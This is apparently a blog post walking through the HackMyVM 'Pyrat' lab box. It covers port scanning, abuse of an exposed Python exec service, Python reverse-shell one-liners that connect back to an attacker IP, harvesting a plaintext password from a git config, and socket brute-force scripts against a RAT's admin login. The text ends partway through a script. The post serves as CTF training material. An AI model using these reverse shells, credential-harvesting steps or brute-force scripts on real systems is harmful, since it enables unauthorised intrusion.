{"id":580,"date":"2024-04-17T19:22:06","date_gmt":"2024-04-17T11:22:06","guid":{"rendered":"http:\/\/162.14.82.114\/?p=580"},"modified":"2024-04-17T19:22:06","modified_gmt":"2024-04-17T11:22:06","slug":"hmv-_-pyrat","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/580\/04\/17\/2024\/","title":{"rendered":"hmv[-_-]pyrat"},"content":{"rendered":"<h1>Pyrat<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171918347.png\" alt=\"image-20240417191845673\" \/><\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171918662.png\" alt=\"image-20240401145246202\" style=\"zoom: 50%;\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">nmap -sCV -p 1-65535 172.20.10.13<\/code><\/pre>\n<pre><code class=\"language-text\">PORT     STATE SERVICE  VERSION\n22\/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)\n|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)\n|_  256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)\n8000\/tcp open  http-alt SimpleHTTP\/0.6 Python\/3.11.2\n|_http-title: Site doesn&#039;t have a title (text\/html; charset=utf-8).\n|_http-server-header: SimpleHTTP\/0.6 Python\/3.11.2\n| fingerprint-strings: \n|   DNSStatusRequestTCP, DNSVersionBindReqTCP, LANDesk-RC, Socks4, X11Probe: \n|     source code string cannot contain null bytes\n|   FourOhFourRequest, LPDString, SIPOptions: \n|     invalid syntax (&lt;string&gt;, line 1)\n|   GetRequest: \n|     name &#039;GET&#039; is not defined\n|   HTTPOptions, RTSPRequest: \n|     name &#039;OPTIONS&#039; is not defined\n|   Help: \n|     name &#039;HELP&#039; is not defined\n|   Kerberos: \n|     &#039;utf-8&#039; codec can&#039;t decode byte 0x81 in position 5: invalid start byte\n|   LDAPBindReq: \n|     &#039;utf-8&#039; codec can&#039;t decode byte 0x80 in position 12: invalid start byte\n|   LDAPSearchReq: \n|     &#039;utf-8&#039; codec can&#039;t decode byte 0x84 in position 1: invalid start byte\n|   RPCCheck: \n|     &#039;utf-8&#039; codec can&#039;t decode byte 0x80 in position 0: invalid start byte\n|   SMBProgNeg: \n|     &#039;utf-8&#039; codec can&#039;t decode byte 0xa4 in position 3: invalid start byte\n|   SSLSessionReq: \n|     &#039;utf-8&#039; codec can&#039;t decode byte 0xd7 in position 13: invalid continuation byte\n|   Socks5: \n|     &#039;utf-8&#039; codec can&#039;t decode byte 0x80 in position 5: invalid start byte\n|   TLSSessionReq: \n|     
&#039;utf-8&#039; codec can&#039;t decode byte 0xa7 in position 13: invalid start byte\n|   TerminalServerCookie: \n|_    &#039;utf-8&#039; codec can&#039;t decode byte 0xe0 in position 5: invalid continuation byte\n|_http-open-proxy: Proxy might be redirecting requests\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port8000-TCP:V=7.94SVN%I=7%D=4\/1%Time=660A59F0%P=x86_64-pc-linux-gnu%r(\nSF:GenericLines,1,&quot;\\n&quot;)%r(GetRequest,1A,&quot;name\\x20&#039;GET&#039;\\x20is\\x20not\\x20def\nSF:ined\\n&quot;)%r(X11Probe,2D,&quot;source\\x20code\\x20string\\x20cannot\\x20contain\\x\nSF:20null\\x20bytes\\n&quot;)%r(FourOhFourRequest,22,&quot;invalid\\x20syntax\\x20\\(&lt;str\nSF:ing&gt;,\\x20line\\x201\\)\\n&quot;)%r(Socks5,47,&quot;&#039;utf-8&#039;\\x20codec\\x20can&#039;t\\x20deco\nSF:de\\x20byte\\x200x80\\x20in\\x20position\\x205:\\x20invalid\\x20start\\x20byte\\\nSF:n&quot;)%r(Socks4,2D,&quot;source\\x20code\\x20string\\x20cannot\\x20contain\\x20null\\\nSF:x20bytes\\n&quot;)%r(HTTPOptions,1E,&quot;name\\x20&#039;OPTIONS&#039;\\x20is\\x20not\\x20define\nSF:d\\n&quot;)%r(RTSPRequest,1E,&quot;name\\x20&#039;OPTIONS&#039;\\x20is\\x20not\\x20defined\\n&quot;)%r\nSF:(RPCCheck,47,&quot;&#039;utf-8&#039;\\x20codec\\x20can&#039;t\\x20decode\\x20byte\\x200x80\\x20in\nSF:\\x20position\\x200:\\x20invalid\\x20start\\x20byte\\n&quot;)%r(DNSVersionBindReqT\nSF:CP,2D,&quot;source\\x20code\\x20string\\x20cannot\\x20contain\\x20null\\x20bytes\\n\nSF:&quot;)%r(DNSStatusRequestTCP,2D,&quot;source\\x20code\\x20string\\x20cannot\\x20cont\nSF:ain\\x20null\\x20bytes\\n&quot;)%r(Help,1B,&quot;name\\x20&#039;HELP&#039;\\x20is\\x20not\\x20defi\nSF:ned\\n&quot;)%r(SSLSessionReq,4F,&quot;&#039;utf-8&#039;\\x20codec\\x20can&#039;t\\x20decode\\x20byte\nSF:\\x200xd7\\x20in\\x20position\\x2013:\\x20invalid\\x20continuation\\x20byte\\n&quot;\nSF:)%r(TerminalServ
erCookie,4E,&quot;&#039;utf-8&#039;\\x20codec\\x20can&#039;t\\x20decode\\x20byt\nSF:e\\x200xe0\\x20in\\x20position\\x205:\\x20invalid\\x20continuation\\x20byte\\n&quot;\nSF:)%r(TLSSessionReq,48,&quot;&#039;utf-8&#039;\\x20codec\\x20can&#039;t\\x20decode\\x20byte\\x200x\nSF:a7\\x20in\\x20position\\x2013:\\x20invalid\\x20start\\x20byte\\n&quot;)%r(Kerberos,\nSF:47,&quot;&#039;utf-8&#039;\\x20codec\\x20can&#039;t\\x20decode\\x20byte\\x200x81\\x20in\\x20positi\nSF:on\\x205:\\x20invalid\\x20start\\x20byte\\n&quot;)%r(SMBProgNeg,47,&quot;&#039;utf-8&#039;\\x20co\nSF:dec\\x20can&#039;t\\x20decode\\x20byte\\x200xa4\\x20in\\x20position\\x203:\\x20inval\nSF:id\\x20start\\x20byte\\n&quot;)%r(LPDString,22,&quot;invalid\\x20syntax\\x20\\(&lt;string&gt;\nSF:,\\x20line\\x201\\)\\n&quot;)%r(LDAPSearchReq,47,&quot;&#039;utf-8&#039;\\x20codec\\x20can&#039;t\\x20d\nSF:ecode\\x20byte\\x200x84\\x20in\\x20position\\x201:\\x20invalid\\x20start\\x20by\nSF:te\\n&quot;)%r(LDAPBindReq,48,&quot;&#039;utf-8&#039;\\x20codec\\x20can&#039;t\\x20decode\\x20byte\\x2\nSF:00x80\\x20in\\x20position\\x2012:\\x20invalid\\x20start\\x20byte\\n&quot;)%r(SIPOpt\nSF:ions,22,&quot;invalid\\x20syntax\\x20\\(&lt;string&gt;,\\x20line\\x201\\)\\n&quot;)%r(LANDesk-\nSF:RC,2D,&quot;source\\x20code\\x20string\\x20cannot\\x20contain\\x20null\\x20bytes\\n\nSF:&quot;);\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h2>Vulnerability Exploitation<\/h2>\n<p>First, visit its port <code>8000<\/code> and try to dig up some information:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171918314.png\" alt=\"image-20240401145457040\" style=\"zoom:50%;\" \/><\/p>\n<p>Try connecting directly:<\/p>\n<pre><code class=\"language-bash\">nc 172.20.10.13 8000\nwhoami;id\nname &#039;whoami&#039; is not defined\nhelp\n\n?\ninvalid syntax (&lt;string&gt;, line 1)\nls\nname &#039;ls&#039; is not defined\n-V     \nname &#039;V&#039; is not defined\nimport pty;pty.spawn(&quot;\/bin\/bash&quot;)\ninvalid character in identifier (&lt;string&gt;, line 1)\nimport os<\/code><\/pre>\n<p>It looks like it can execute Python statements, so try a reverse shell.<\/p>\n<pre><code class=\"language-python\">import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(&quot;172.20.10.8&quot;),int(os.getenv(&quot;1234&quot;))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(&quot;\/bin\/sh&quot;)\n# int() argument must be a string, a bytes-like object or a number, not &#039;NoneType&#039;<\/code><\/pre>\n<p>Try another one:<\/p>\n<pre><code class=\"language-python\">import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;172.20.10.8&quot;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;\/bin\/sh&quot;,&quot;-i&quot;]);<\/code><\/pre>\n<pre><code class=\"language-bash\">pwncat-cs -lp 1234<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171918827.png\" alt=\"image-20240401151210576\" style=\"zoom:50%;\" \/><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-text\">(remote) www-data@Pyrat:\/root$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@Pyrat:\/root$ ls -la\nls: cannot open directory &#039;.&#039;: Permission denied\n(remote) www-data@Pyrat:\/root$ cd \/tmp\n(remote) www-data@Pyrat:\/tmp$ ls\npymp-tohv0yte\nsystemd-private-fee3f836921b4df4ad7c2b30b4d4a50b-ModemManager.service-2N2sVh\nsystemd-private-fee3f836921b4df4ad7c2b30b4d4a50b-systemd-logind.service-fMUUzi\nsystemd-private-fee3f836921b4df4ad7c2b30b4d4a50b-systemd-resolved.service-bXLClh\nsystemd-private-fee3f836921b4df4ad7c2b30b4d4a50b-systemd-timesyncd.service-3pF6Th\n(remote) www-data@Pyrat:\/tmp$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/at\n\/usr\/bin\/fusermount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/pkexec\n\/usr\/bin\/umount\n(remote) www-data@Pyrat:\/tmp$ cd \/var\/www\/html\nbash: cd: \/var\/www\/html: No such file or directory\n(remote) www-data@Pyrat:\/tmp$ cd \/var\n(remote) www-data@Pyrat:\/var$ ls\nbackups  cache  crash  lib  local  lock  log  mail  opt  
run  spool  tmp\n(remote) www-data@Pyrat:\/var$ mail\nmail: cannot stat `\/root\/.mail&#039;: Permission denied\nmail: Cannot open `\/root\/.mailrc&#039;: Permission denied\nNo mail for www-data\n(remote) www-data@Pyrat:\/var$ cd backups\n(remote) www-data@Pyrat:\/var\/backups$ ls\napt.extended_states.0  apt.extended_states.1.gz\n(remote) www-data@Pyrat:\/var\/backups$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:100:102:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:101:103:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-timesync:x:102:104:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:103:106::\/nonexistent:\/usr\/sbin\/nologin\nsyslog:x:104:110::\/home\/syslog:\/usr\/sbin\/nologin\n_apt:x:105:65534::\/nonexistent:\/usr\/sbin\/nologin\ntss:x:106:111:TPM software 
stack,,,:\/var\/lib\/tpm:\/bin\/false\nuuidd:x:107:112::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:108:113::\/nonexistent:\/usr\/sbin\/nologin\nlandscape:x:109:115::\/var\/lib\/landscape:\/usr\/sbin\/nologin\npollinate:x:110:1::\/var\/cache\/pollinate:\/bin\/false\nusbmux:x:111:46:usbmux daemon,,,:\/var\/lib\/usbmux:\/usr\/sbin\/nologin\nsshd:x:112:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nlxd:x:998:100::\/var\/snap\/lxd\/common\/lxd:\/bin\/false\nthink:x:1000:1000:,,,:\/home\/think:\/bin\/bash\nfwupd-refresh:x:113:117:fwupd-refresh user,,,:\/run\/systemd:\/usr\/sbin\/nologin\npostfix:x:114:119::\/var\/spool\/postfix:\/usr\/sbin\/nologin\n(remote) www-data@Pyrat:\/var\/backups$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. 
These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\n(remote) www-data@Pyrat:\/var\/backups$ cd \/\n(remote) www-data@Pyrat:\/$ ls\nbin   dev  home  lib32  libx32      media  opt   root  sbin  swap.img  tmp  var\nboot  etc  lib   lib64  lost+found  mnt    proc  run   srv   sys       usr\n(remote) www-data@Pyrat:\/$ cd opt\n(remote) www-data@Pyrat:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x  3 root  root  4096 Jun 21  2023 .\ndrwxr-xr-x 18 root  root  4096 Dec 22 13:22 ..\ndrwxrwxr-x  3 think think 4096 Jun 21  2023 dev\n(remote) www-data@Pyrat:\/opt$ cd dev\n(remote) www-data@Pyrat:\/opt\/dev$ ls -la\ntotal 12\ndrwxrwxr-x 3 think think 4096 Jun 21  2023 .\ndrwxr-xr-x 3 root  root  4096 Jun 21  2023 ..\ndrwxrwxr-x 8 think think 4096 Jun 21  2023 .git\n(remote) www-data@Pyrat:\/opt\/dev$ cd .git\n(remote) www-data@Pyrat:\/opt\/dev\/.git$ ls -la\ntotal 52\ndrwxrwxr-x 8 think think 4096 Jun 21  2023 .\ndrwxrwxr-x 3 think think 4096 Jun 21  2023 ..\ndrwxrwxr-x 2 think think 4096 Jun 21  2023 branches\n-rw-rw-r-- 1 think think   21 Jun 21  
2023 COMMIT_EDITMSG\n-rw-rw-r-- 1 think think  296 Jun 21  2023 config\n-rw-rw-r-- 1 think think   73 Jun 21  2023 description\n-rw-rw-r-- 1 think think   23 Jun 21  2023 HEAD\ndrwxrwxr-x 2 think think 4096 Jun 21  2023 hooks\n-rw-rw-r-- 1 think think  145 Jun 21  2023 index\ndrwxrwxr-x 2 think think 4096 Jun 21  2023 info\ndrwxrwxr-x 3 think think 4096 Jun 21  2023 logs\ndrwxrwxr-x 7 think think 4096 Jun 21  2023 objects\ndrwxrwxr-x 4 think think 4096 Jun 21  2023 refs\n(remote) www-data@Pyrat:\/opt\/dev\/.git$ cat config\n[core]\n        repositoryformatversion = 0\n        filemode = true\n        bare = false\n        logallrefupdates = true\n[user]\n        name = Jose Mario\n        email = josemlwdf@github.com\n\n[credential]\n        helper = cache --timeout=3600\n\n[credential &quot;https:\/\/github.com&quot;]\n        username = think\n        password = _TH1NKINGPirate$_<\/code><\/pre>\n<h3>Switch to the think User<\/h3>\n<p>Stumbled upon a username and password, so switch user:<\/p>\n<pre><code class=\"language-text\">think\n_TH1NKINGPirate$_<\/code><\/pre>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">think@Pyrat:\/opt\/dev\/.git$ ls -la\ntotal 52\ndrwxrwxr-x 8 think think 4096 Jun 21  2023 .\ndrwxrwxr-x 3 think think 4096 Jun 21  2023 ..\ndrwxrwxr-x 2 think think 4096 Jun 21  2023 branches\n-rw-rw-r-- 1 think think   21 Jun 21  2023 COMMIT_EDITMSG\n-rw-rw-r-- 1 think think  296 Jun 21  2023 config\n-rw-rw-r-- 1 think think   73 Jun 21  2023 description\n-rw-rw-r-- 1 think think   23 Jun 21  2023 HEAD\ndrwxrwxr-x 2 think think 4096 Jun 21  2023 hooks\n-rw-rw-r-- 1 think think  145 Jun 21  2023 index\ndrwxrwxr-x 2 think think 4096 Jun 21  2023 info\ndrwxrwxr-x 3 think think 4096 Jun 21  2023 logs\ndrwxrwxr-x 7 think think 4096 Jun 21  2023 objects\ndrwxrwxr-x 4 think think 4096 Jun 21  2023 refs\nthink@Pyrat:\/opt\/dev\/.git$ sudo -l\n[sudo] password for think: \nSorry, user think 
may not run sudo on pyrat.\nthink@Pyrat:\/opt\/dev\/.git$ git log\ncommit 0a3c36d66369fd4b07ddca72e5379461a63470bf (HEAD -&gt; master)\nAuthor: Jose Mario &lt;josemlwdf@github.com&gt;\nDate:   Wed Jun 21 09:32:14 2023 +0000\n\n    Added shell endpoint\nthink@Pyrat:\/opt\/dev\/.git$ git show\ncommit 0a3c36d66369fd4b07ddca72e5379461a63470bf (HEAD -&gt; master)\nAuthor: Jose Mario &lt;josemlwdf@github.com&gt;\nDate:   Wed Jun 21 09:32:14 2023 +0000\n\n    Added shell endpoint\n\ndiff --git a\/pyrat.py.old b\/pyrat.py.old\nnew file mode 100644\nindex 0000000..ce425cf\n--- \/dev\/null\n+++ b\/pyrat.py.old\n@@ -0,0 +1,27 @@\n+...............................................\n+\n+def switch_case(client_socket, data):\n+    if data == &#039;some_endpoint&#039;:\n+        get_this_enpoint(client_socket)\n+    else:\n+        # Check socket is admin and downgrade if is not aprooved\n+        uid = os.getuid()\n+        if (uid == 0):\n+            change_uid()\n+\n+        if data == &#039;shell&#039;:\n+            shell(client_socket)\n+        else:\n+            exec_python(client_socket, data)\n+\n+def shell(client_socket):\n+    try:\n+        import pty\n+        os.dup2(client_socket.fileno(), 0)\n+        os.dup2(client_socket.fileno(), 1)\n+        os.dup2(client_socket.fileno(), 2)\n+        pty.spawn(&quot;\/bin\/sh&quot;)\n+    except Exception as e:\n+        send_data(client_socket, e\n+\n+...............................................\nthink@Pyrat:\/opt\/dev\/.git$ ps aux | grep &quot;root&quot;\n# Only part of the output is shown; a large number of pyrat processes were found....\nroot        1506  1.3  0.5  22048 11584 ?        R    06:56   0:20 python3 \/root\/pyrat.py\nwww-data    1519  1.3  0.5  22184 11952 ?        R    06:59   0:17 python3 \/root\/pyrat.py\nroot        1553  0.0  0.0      0     0 ?        I    07:01   0:00 [kworker\/0:1-events]\nwww-data    1575  0.0  0.6  22184 12368 ?        
S    07:04   0:00 python3 \/root\/pyrat.py\nroot        1614  0.0  0.0      0     0 ?        I    07:09   0:00 [kworker\/u2:2-events_power_efficient]\nroot        1771  0.0  0.0      0     0 ?        I    07:16   0:00 [kworker\/u2:1-events_power_efficient]\nroot        1797  0.0  0.1   8784  3992 pts\/0    S    07:17   0:00 su think\nroot        1817  0.0  0.0      0     0 ?        I    07:17   0:00 [kworker\/0:0-events]\nroot        1865  0.0  0.0      0     0 ?        I    07:21   0:00 [kworker\/u2:0-events_unbound]\nthink       1867  0.0  0.0   6432   660 pts\/0    S+   07:21   0:00 grep --color=auto root<\/code><\/pre>\n<p>I suspect these are related.<\/p>\n<p>Let ChatGPT interpret it:<\/p>\n<pre><code class=\"language-python\">def switch_case(client_socket, data):\n    if data == &#039;some_endpoint&#039;:\n        get_this_enpoint(client_socket)\n    else:\n        # Check if the socket is admin and downgrade if not approved\n        uid = os.getuid()\n        if uid == 0:  # Check if the user is root\/administrator\n            change_uid()  # If yes, change to a non-administrator user\n\n        if data == &#039;shell&#039;:\n            shell(client_socket)  # If the data is &#039;shell&#039;, invoke the shell function\n        else:\n            exec_python(client_socket, data)  # Otherwise, execute Python code\n\ndef shell(client_socket):\n    try:\n        import pty\n        os.dup2(client_socket.fileno(), 0)  # Redirect standard input\n        os.dup2(client_socket.fileno(), 1)  # Redirect standard output\n        os.dup2(client_socket.fileno(), 2)  # Redirect standard error\n        pty.spawn(&quot;\/bin\/sh&quot;)  # Start a shell process\n    except Exception as e:\n        send_data(client_socket, e)  # If an exception occurs, send the error message back to the 
client<\/code><\/pre>\n<p>So what we want to execute is this shell, i.e. get the root-owned pyrat process to spawn a shell for us:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171917221.png\" alt=\"image-20240401154016589\" style=\"zoom:33%;\" \/><\/p>\n<p>Next, find a way to do that:<\/p>\n<p>Search online for what this Pyrat actually is:<\/p>\n<blockquote>\n<p>PyRat is a user-friendly Python library for analyzing data from DeepLabCut. It aims to help researchers who are unfamiliar with programming carry out animal behavior analysis more easily.<\/p>\n<p>PyRat is a flexible framework for post-processing synthetic aperture radar (SAR) data. It is designed for airborne and spaceborne data, with a particular focus on providing a simple plugin-based programming interface.<\/p>\n<p>Python Remote Administrations 
Tools<\/p>\n<\/blockquote>\n<p>It is obviously the third one, and the approach here is brute force.... (peeked at a writeup)<\/p>\n<p>Checking <code>\/var\/mail<\/code>, there is a mail message:<\/p>\n<pre><code class=\"language-text\">From root@pyrat  Thu Jun 15 09:08:55 2023\nReturn-Path: &lt;root@pyrat&gt;\nX-Original-To: think@pyrat\nDelivered-To: think@pyrat\nReceived: by pyrat.localdomain (Postfix, from userid 0)\n        id 2E4312141; Thu, 15 Jun 2023 09:08:55 +0000 (UTC)\nSubject: Hello\nTo: &lt;think@pyrat&gt;\nX-Mailer: mail (GNU Mailutils 3.7)\nMessage-Id: &lt;20230615090855.2E4312141@pyrat.localdomain&gt;\nDate: Thu, 15 Jun 2023 09:08:55 +0000 (UTC)\nFrom: Dbile Admen &lt;root@pyrat&gt;\n\nHello jose, I wanted to tell you that i have installed the RAT you posted on your GitHub page, i&#039;ll test it tonight so don&#039;t be scared if you see it running. Regards, Dbile Admen<\/code><\/pre>\n<p>Then I found it directly on the author&#039;s GitHub: https:\/\/github.com\/josemlwdf\/PyRAT<\/p>\n<p>Looking at the source code, I found this:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171917024.png\" alt=\"image-20240401184802967\" style=\"zoom: 50%;\" \/><\/p>\n<p>The username is <code>admin<\/code>, and a password was also found:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404171917745.png\" alt=\"image-20240401185530905\" style=\"zoom:50%;\" \/><\/p>\n<p>It is <code>testpass<\/code>, but testing showed that this is not the right password, although the username does seem to be right.<\/p>\n<p>His <code>README.txt<\/code> contains the following:<\/p>\n<p>After connecting, you can interact with the script using the following commands:<\/p>\n<ul>\n<li><strong>Admin<\/strong>: To access the admin functionality, type <code>admin<\/code> and press Enter. You will be prompted to enter a password. Enter the password and press Enter. If the password is correct, you will see the message &quot;Welcome Admin!!! Type 'shell' to begin&quot;. You can then proceed to use the shell functionality.<\/li>\n<li><strong>Shell<\/strong>: To access the shell functionality, type <code>shell<\/code> and press Enter. This will spawn a shell on the server, allowing you to execute commands. 
You can enter any valid shell command, and the output will be displayed on your <code>nc<\/code> session.<\/li>\n<li><strong>Python Interactive<\/strong>: To execute python commands on the server just send your python commands and it will be passed to the <code>exec<\/code> function.<\/li>\n<\/ul>\n<p>I shelved this for a while without finishing it, and later came back to it:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/pyrat]\n\u2514\u2500$ sudo arp-scan -l -I eth1 \n[sudo] password for kali: \nInterface: eth1, type: EN10MB, MAC: 08:00:27:fb:51:ff, IPv4: 192.168.0.143\nStarting arp-scan 1.10.0 with 256 hosts (https:\/\/github.com\/royhills\/arp-scan)\n192.168.0.1     b0:0a:d5:b9:c2:92       zte corporation\n192.168.0.152   34:2e:b7:08:3d:a1       Intel Corporate\n192.168.0.179   08:00:27:99:ba:43       PCS Systemtechnik GmbH\n\n3 packets received by filter, 0 packets dropped by kernel\nEnding arp-scan 1.10.0: 256 hosts scanned in 2.014 seconds (127.11 hosts\/sec). 3 responded\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/pyrat]\n\u2514\u2500$ ssh think@192.168.0.179  \nThe authenticity of host &#039;192.168.0.179 (192.168.0.179)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:Ndgax\/DOZA6JS00F3afY6VbwjVhV2fg5OAMP9TqPAOs.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? 
yes\nWarning: Permanently added &#039;192.168.0.179&#039; (ED25519) to the list of known hosts.\nthink@192.168.0.179&#039;s password: \nWelcome to Ubuntu 20.04.6 LTS (GNU\/Linux 5.4.0-150-generic x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/advantage\n\n  System information as of Tue 16 Apr 2024 07:32:00 AM UTC\n\n  System load:  0.09              Processes:               123\n  Usage of \/:   45.7% of 9.75GB   Users logged in:         0\n  Memory usage: 10%               IPv4 address for enp0s3: 192.168.0.179\n  Swap usage:   0%\n\n * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s\n   just raised the bar for easy, resilient and secure K8s cluster deployment.\n\n   https:\/\/ubuntu.com\/engage\/secure-kubernetes-at-the-edge\n\nExpanded Security Maintenance for Applications is not enabled.\n0 updates can be applied immediately.\nEnable ESM Apps to receive additional future security updates.\nSee https:\/\/ubuntu.com\/esm or run: sudo pro status\n\nThe list of available updates is more than a week old.\nTo check for new updates run: sudo apt update\n\nYou have mail.\nLast login: Mon Apr  1 10:13:01 2024 from 172.20.10.8\nthink@Pyrat:~$ <\/code><\/pre>\n<h3>The Author&#039;s Solution<\/h3>\n<pre><code class=\"language-python\">import socket\n# Define the server&#039;s address and port\nserver_address = (&#039;192.168.80.128&#039;, 8000)  # Replace with your server&#039;s address and port\n\ndef send_word(word):\n    # Create a socket object\n    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    try:\n        # Connect to the server\n        client_socket.connect(server_address)\n\n        # Send the word to the server\n        client_socket.sendall(word.encode())\n\n        # Receive data from the server (if applicable)\n        response = client_socket.recv(1024)\n        response = response.decode()\n        if not 
word in response:\n            print(f&quot;Sent: {word} | Received: {response}&quot;)\n\n    except ConnectionRefusedError:\n        print(&quot;Connection was refused. Is the server running?&quot;)\n    finally:\n        # Close the socket connection\n        client_socket.close()\n\ndef read_wordlist_from_file(filename):\n    with open(filename, &#039;r&#039;) as file:\n        wordlist = file.readlines()\n        return [word.strip() for word in wordlist]\n\n# Path to the wordlist file\nwordlist_filename = &#039;wordlist.txt&#039;\n\n# Read words from the file\nwords = read_wordlist_from_file(wordlist_filename)\n\n# Iterate through the words and send each one to the server\nfor word in words:\n    send_word(word)<\/code><\/pre>\n<p>That one is for finding the account name; the following one brute-forces the password:<\/p>\n<pre><code class=\"language-python\">def test_this(password):\n    # Create a socket object\n    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    try:\n        # Connect to the server\n        client_socket.connect(server_address)\n        # Send the word to the server\n        client_socket.sendall(&#039;admin&#039;.encode())\n        # Receive data from the server (if applicable)\n        response = client_socket.recv(1024)\n        response = 